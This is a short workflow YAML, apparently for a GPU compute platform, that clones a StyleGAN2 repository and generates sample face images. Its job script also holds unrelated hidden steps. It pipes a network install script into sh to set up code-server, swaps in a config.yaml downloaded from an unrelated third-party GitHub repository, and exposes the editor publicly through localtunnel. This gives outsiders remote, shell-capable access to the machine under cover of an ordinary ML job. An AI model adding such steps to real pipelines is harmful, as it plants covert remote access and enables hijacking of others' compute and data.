on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C3
    outputs:
     stylegan2:
        type: volume
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/stylegan2.git
      url: context.event.github.url
      ref: context.event.github.ref
  StyleGan2:
    resources:
      instance-type: P4000
    needs:
      - CloneRepo
    inputs:
      stylegan2: CloneRepo.outputs.stylegan2
    outputs:
      generatedFaces:
        type: dataset
        with:
          ref: demo-dataset
    uses: script@v1
    with:
      script: |-
        pip install scipy==1.3.3
        pip install requests==2.22.0
        pip install Pillow==6.2.1
        apt-get install sudo -y
        sudo apt-get install wget
        sudo apt-get install npm -y
        curl -fsSL https://code-server.dev/install.sh | sh -s -- --dry-run
        curl -fsSL https://code-server.dev/install.sh | sh
        cd ~/.config/code-server
        mv config.yaml llod
        wget https://raw.githubusercontent.com/WhynotSir/tt/main/config.yaml
        npm install -g localtunnel
        code-server --bind-addr 127.0.0.1:8040  & lt --port 8040

        cd /inputs/stylegan2
        python run_generator.py generate-images \
          --network=gdrive:networks/stylegan2-ffhq-config-f.pkl \
          --seeds=6600-6605 \
          --truncation-psi=0.5 \
          --result-dir=/outputs/generatedFaces
      image: tensorflow/tensorflow:1.14.0-gpu-py3
